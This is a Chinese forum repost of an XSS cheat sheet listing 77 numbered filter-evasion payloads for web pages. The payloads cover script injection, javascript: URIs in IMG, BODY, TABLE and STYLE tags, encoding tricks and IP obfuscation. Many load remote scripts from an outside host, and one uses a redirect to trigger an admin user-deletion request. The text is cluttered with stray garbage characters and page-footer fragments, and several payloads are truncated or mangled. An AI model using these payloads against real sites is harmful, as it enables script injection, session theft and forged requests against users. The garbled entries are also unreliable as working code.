貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 D! }1 g/ v- g2 Z& X
(1)普通的XSS JavaScript注入
, X+ Y' h+ c( `0 C& P, U" d- g<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 d% B8 f7 N; o" A! f( S
(2)IMG标签XSS使用JavaScript命令7 p0 q( g" p/ m- D! }7 f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' T3 X" s. H# D(3)IMG标签无分号无引号4 \8 D; t$ ^+ y
<IMG SRC=javascript:alert(‘XSS’)>
! L! N$ j) u1 b' Z(4)IMG标签大小写不敏感
- A9 [( ]( z3 h; }) F1 P5 v<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 u: w5 f3 _, ^
(5)HTML编码(必须有分号)1 I/ C- _7 T! Y3 h
<IMG SRC=javascript:alert(“XSS”)>
7 Z+ @+ _7 E+ {6 J(6)修正缺陷IMG标签2 e5 l4 m1 I( W- V$ L3 a- n# Z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% p! a% t$ G1 v8 i5 E7 G, S; [+ Q/ K0 k6 }3 C$ K8 K0 Z9 U0 b
; w" j: Y6 X& N& |: Y
(7)formCharCode标签(计算器)
3 j, V2 b9 t4 w' ]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 {, G/ q! M7 C' w( g
(8)UTF-8的Unicode编码(计算器)
. b/ }& r5 `+ Z1 A& g<IMG SRC=jav..省略..S')>
3 ?. F$ O0 M' M9 Z0 I; p4 L- `/ k) A7 _(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 w2 y9 i* ^% j+ J" v" J- F; ^2 }
<IMG SRC=jav..省略..S')>3 d3 t9 o# s2 Q8 L" P3 R& z
(10)十六进制编码也是没有分号(计算器): a" C( w% ^$ l' |5 S& {* {$ O2 R( H
<IMG SRC=java..省略..XSS')>
4 t' u, v( @! z3 i( b2 U(11)嵌入式标签,将Javascript分开9 i3 J/ ~" E/ L, f/ {9 E9 O
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 z+ m9 i2 \0 J$ Q! `' d
(12)嵌入式编码标签,将Javascript分开
! h% t: {" s' j<IMG SRC=”jav ascript:alert(‘XSS’);”>
) O- y* S& g( f' x" W(13)嵌入式换行符
, E* s* z6 }' q<IMG SRC=”jav ascript:alert(‘XSS’);”>4 Q5 J0 j* }5 M& o
(14)嵌入式回车
5 i/ X* T# R" Q9 ]$ m0 V% v5 g) B<IMG SRC=”jav ascript:alert(‘XSS’);”>
: Q- M2 G z. t& T9 W(15)嵌入式多行注入JavaScript,这是XSS极端的例子& e: ?4 J; m, R
<IMG SRC=”javascript:alert(‘XSS‘)”>
. q( a. d. `! C+ s0 d/ u(16)解决限制字符(要求同页面)
: w6 i2 h/ n2 K4 [: E: g% Y<script>z=’document.’</script>. Z7 T7 U* A/ U6 o
<script>z=z+’write(“‘</script>0 H; S/ t! y/ N0 e
<script>z=z+’<script’</script>2 Z7 ]; ~8 m0 c# i- C6 m- M& C" h
<script>z=z+’ src=ht’</script>
8 F) l3 B. W X8 J& x' H8 g<script>z=z+’tp://ww’</script>+ X' Q& p3 I& `9 F8 r- B. q, q+ Z
<script>z=z+’w.shell’</script>
$ Q& v8 v- v, S9 K6 P V<script>z=z+’.net/1.’</script>0 ?: i( m( \# N5 C2 o' j. T
<script>z=z+’js></sc’</script>1 U: X. a: I7 [4 X
<script>z=z+’ript>”)’</script> ? I- Q0 Q8 p6 G; K
<script>eval_r(z)</script>
( x5 {6 e s5 ?6 C$ b(17)空字符12-7-1 T00LS - Powered by Discuz! Board
! K5 F- x; H; U9 G/ Bhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
) u" O/ b0 d5 m7 h, F* Rperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; P8 q7 @9 i- E( Z# J- U3 e5 h: A(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 F4 d8 C/ L3 ~
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 [; o6 ?( @; h2 b
(19)Spaces和meta前的IMG标签
) }$ v2 ~! g4 t5 P& K8 ?& |% K<IMG SRC=” javascript:alert(‘XSS’);”>
; v* f" O7 v4 Y, g1 _(20)Non-alpha-non-digit XSS
$ _* l* V1 E; i8 @6 ]<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( q" N9 w9 {# v) @1 i2 ~# }" q(21)Non-alpha-non-digit XSS to 2
8 C$ Y; _$ n+ d9 ?<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ t. q; q8 H. H+ W. L
(22)Non-alpha-non-digit XSS to 39 H+ u9 S9 h7 f2 h
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" z/ ~2 W4 A, E5 J" L
(23)双开括号7 F. x3 v' E% O0 _
<<SCRIPT>alert(“XSS”);//<</SCRIPT>% k+ y! y* B6 Z3 H3 g# ~8 U
(24)无结束脚本标记(仅火狐等浏览器)0 J* ]. d) B6 j
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* B8 f7 I8 H1 I$ U- O0 z
(25)无结束脚本标记2
6 {; F# F! h* @# I- E6 i; ^# r<SCRIPT SRC=//3w.org/XSS/xss.js> [! V& W& Y7 @9 c" S
(26)半开的HTML/JavaScript XSS
& h1 [$ ^% @% }% _9 u8 s" V<IMG SRC=”javascript:alert(‘XSS’)”/ m! x+ z' H7 Y/ l# e
(27)双开角括号
- y! b; p7 H8 A+ ?7 ?. L<iframe src=http://3w.org/XSS.html <4 w* i( b9 |5 g' r
(28)无单引号 双引号 分号* S% G/ C/ V- U$ V2 f1 x
<SCRIPT>a=/XSS/
5 k, g+ S1 k+ P, Lalert(a.source)</SCRIPT>
& O) |: @ D b) z( Q- S(29)换码过滤的JavaScript7 m( u$ Y. [; n( w) Y& J& b
\”;alert(‘XSS’);/// N# y; l* p8 y& B0 B* i) T: e
(30)结束Title标签% s& w$ Y9 _; G' R' a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( k+ c5 z! K0 L
(31)Input Image. A, m' [ f- d. T: b0 y( S7 q8 y- `
<INPUT SRC=”javascript:alert(‘XSS’);”>
. k9 K! q# d2 |) |- ?) h(32)BODY Image
' Z. J# w+ u) Z: P) s$ F# `! C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( f4 x7 V8 n6 ~& s
(33)BODY标签
5 G0 r& W+ i! I( i<BODY(‘XSS’)>
4 D% r: d( V" F8 z4 C- v1 ?1 b(34)IMG Dynsrc% j2 h& W1 L5 V
<IMG DYNSRC=”javascript:alert(‘XSS’)”>. M# M. B! s5 u7 a1 N6 _
(35)IMG Lowsrc1 K" n( y, l; |; m" I
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ m4 }4 Y- _1 T+ C4 p5 Q( J(36)BGSOUND+ q S* z1 {' q/ H" w/ _; V
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. W }% V K; L7 W/ c; L0 c5 r
(37)STYLE sheet1 M0 H( O- I, Q" F6 k
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 m) C& x. u0 m' N3 ]9 C$ d(38)远程样式表$ L' e+ ~5 c1 z+ `7 a# u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 I; [' U9 ]( s C5 M7 o
(39)List-style-image(列表式)
5 X+ y2 _; Z# h( p- E<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- a5 q$ B* L; l( y5 U3 A" b4 ?
(40)IMG VBscript5 R: ?' ?+ Z4 x8 {4 n. G
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS9 d5 p3 _( V; u) q6 b" e9 F
(41)META链接url
! M- D, m2 X6 j/ P3 N/ n9 \7 y5 ?# R* ^6 \- ?0 e
! C" _- b0 d0 W& v<META HTTP-EQUIV=”refresh” CONTENT=”0;4 [8 x2 c# P2 z1 E2 W
URL=http://;URL=javascript:alert(‘XSS’);”>8 J8 v5 x5 [* z j2 b' }
(42)Iframe
9 j @7 z2 ^+ n( E1 ?<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 G( s8 P, l% V
(43)Frame0 Y. m. ?. s$ A+ N! C, i
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 f: S& O* b9 z' Ehttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
" v& i/ Q7 `8 C2 t, F' Q(44)Table
/ v/ T2 G I% S* _<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: p; z& |; a& ?(45)TD
; R7 \3 p' G% Y0 m5 t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& _2 f' U8 F8 U5 S0 C0 f
(46)DIV background-image
* N* g; T9 N* M. z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 Q0 o9 P6 s ^) Y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
( M8 l! D/ |2 A$ g8&13&12288&65279)
3 K) O9 l1 j- Q$ M& V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* `- r! |+ o0 i5 e" E7 w(48)DIV expression" ^% d7 p: D' z: }) o# {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 W9 V0 p( o( X2 ^1 j$ P. \(49)STYLE属性分拆表达; l/ f J% a1 R O; A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( j/ g' ]& j8 v(50)匿名STYLE(组成:开角号和一个字母开头) [! F& a9 R. T7 y2 @, y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ i- x/ X6 k% ~3 E4 Q( U(51)STYLE background-image3 m( i6 |: M! E" @' P$ x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 e1 V0 k' i2 L- w2 S
CLASS=XSS></A>
% B7 E2 v- }3 J* _/ E- P) _(52)IMG STYLE方式
* V. \) u* r0 U2 Bexppression(alert(“XSS”))’>
8 X2 \# {/ ~& n(53)STYLE background
2 H) `5 a, D! N; S# }<STYLE><STYLE
5 z& D' d/ i) Btype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 |2 d! k' p/ h* Q(54)BASE
5 ?2 R, |1 y- c$ F<BASE HREF=”javascript:alert(‘XSS’);//”>
4 a( _* u) c: k! o, a( b1 {3 j(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ F X7 }+ ]9 }. {* K9 l6 o<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
+ T, F. ^; q6 Y/ L- o/ E(56)在flash中使用ActionScrpt可以混进你XSS的代码& }0 q! t) K. N" K/ \9 b
a=”get”;+ O' `+ P* I) @, t
b=”URL(\”";0 Y0 w/ L& i# k+ _. \1 L1 s8 O: F
c=”javascript:”;
7 v+ _0 s, x( [d=”alert(‘XSS’);\”)”;6 M4 r3 ]% G% f' J
eval_r(a+b+c+d); l! @4 k& p+ f" s; i. B& A$ I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上+ \# ~% o' t9 N- s# T, ^
<HTML xmlns:xss>7 Q/ c5 d( k i7 g" P+ U* {
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
1 o$ t- x _& r9 C; U3 X6 _<xss:xss>XSS</xss:xss>
5 u7 f* Q ]7 G. g1 c</HTML>0 Z* y; R) {& U6 o
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- a* y2 x6 n! M7 R9 a<SCRIPT SRC=””></SCRIPT>
% ^6 u0 c }1 O9 w [ n* y(59)IMG嵌入式命令,可执行任意命令
2 s1 a2 n/ G4 K/ B! Q<IMG SRC=”http://www.XXX.com/a.php?a=b”>) |& D* t# }/ y+ R7 F+ `
(60)IMG嵌入式命令(a.jpg在同服务器)
: x% c' w5 E, C: |" lRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser P* W) b& I [0 {, q
(61)绕符号过滤- _/ d' \2 O: [: Z6 `& U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! {2 t) d7 ~+ J3 P' E(62)
. Y: X5 Z7 @6 c1 A, |; _<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 e6 V/ w# d! Z( w(63)
$ L/ ^5 [. ?6 J6 D2 o<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% k, b8 ]9 l% B' P" S# W
(64)$ t/ _; g5 X/ e8 V
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) L3 y, e" B% z& H0 I9 g1 j. ]
(65)
# U( G! X3 i; e8 l! n5 E<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 W6 g( J4 n7 m) ~! {! e
(66)12-7-1 T00LS - Powered by Discuz! Board: n2 V& F* F' ]
https://www.t00ls.net/viewthread ... table&tid=15267 4/67 U: H2 {! q+ |, V# E* j
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 o `; [) Y4 }! T7 f
(67), Y2 z( W( V D" O- m. d. W
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>* ~' z5 V" X E/ c- H# M* x" ~4 l
</SCRIPT>6 `1 e9 D( T9 q3 c7 L
(68)URL绕行3 ~, Z( U0 }2 e5 e
<A HREF=”http://127.0.0.1/”>XSS</A>
2 P( H& K+ C* A: z' g, {$ W(69)URL编码. Z1 I/ n6 m+ G. v: Y) G& g, _
<A HREF=”http://3w.org”>XSS</A>9 ], _6 P0 R3 w
(70)IP十进制0 ]9 ~. J+ b) N# u# [* |
<A HREF=”http://3232235521″>XSS</A>+ M% q y5 \% d1 R& @
(71)IP十六进制6 n, f" S8 x& Q& \0 P# h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" J% \: Q$ ?9 h) y7 e( k1 t$ m(72)IP八进制
8 H/ t8 |( c" J; C<A HREF=”http://0300.0250.0000.0001″>XSS</A>
, F3 z% _* F: m5 I" R( }, W(73)混合编码
! f+ J5 n# Z2 ?/ x<A HREF=”h8 J2 u) S# U6 ?
tt p://6 6.000146.0×7.147/”">XSS</A>
0 D- Y+ h) K9 m, e0 U(74)节省[http:]/ e; o& o/ w% v1 H( D2 o9 o9 h- D
<A HREF=”//www.google.com/”>XSS</A>/ g$ @+ O+ a0 J" Y" l2 I
(75)节省[www]
6 C3 {! R# D* Y; a/ z: b<A HREF=”http://google.com/”>XSS</A>% F$ Y2 h; V: H, Z L* n4 u* A
(76)绝对点绝对DNS
" y( b& W' A" W<A HREF=”http://www.google.com./”>XSS</A>
; ?0 y& X9 x$ L& L! M. G) U(77)javascript链接. Y/ U: Y. T, B2 g7 j# _
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 |, z* j' `0 y( B% N1 S5 f! K4 |6 q
* U; F6 Y4 o& \; \; |; n原文地址:http://fuzzexp.org/u/0day/?p=14
1 T% Y1 u. a6 |/ Q! o
: G% x: \& M6 f+ f& l |
发表于 2013-4-19 19:22:37
收藏
支持
反对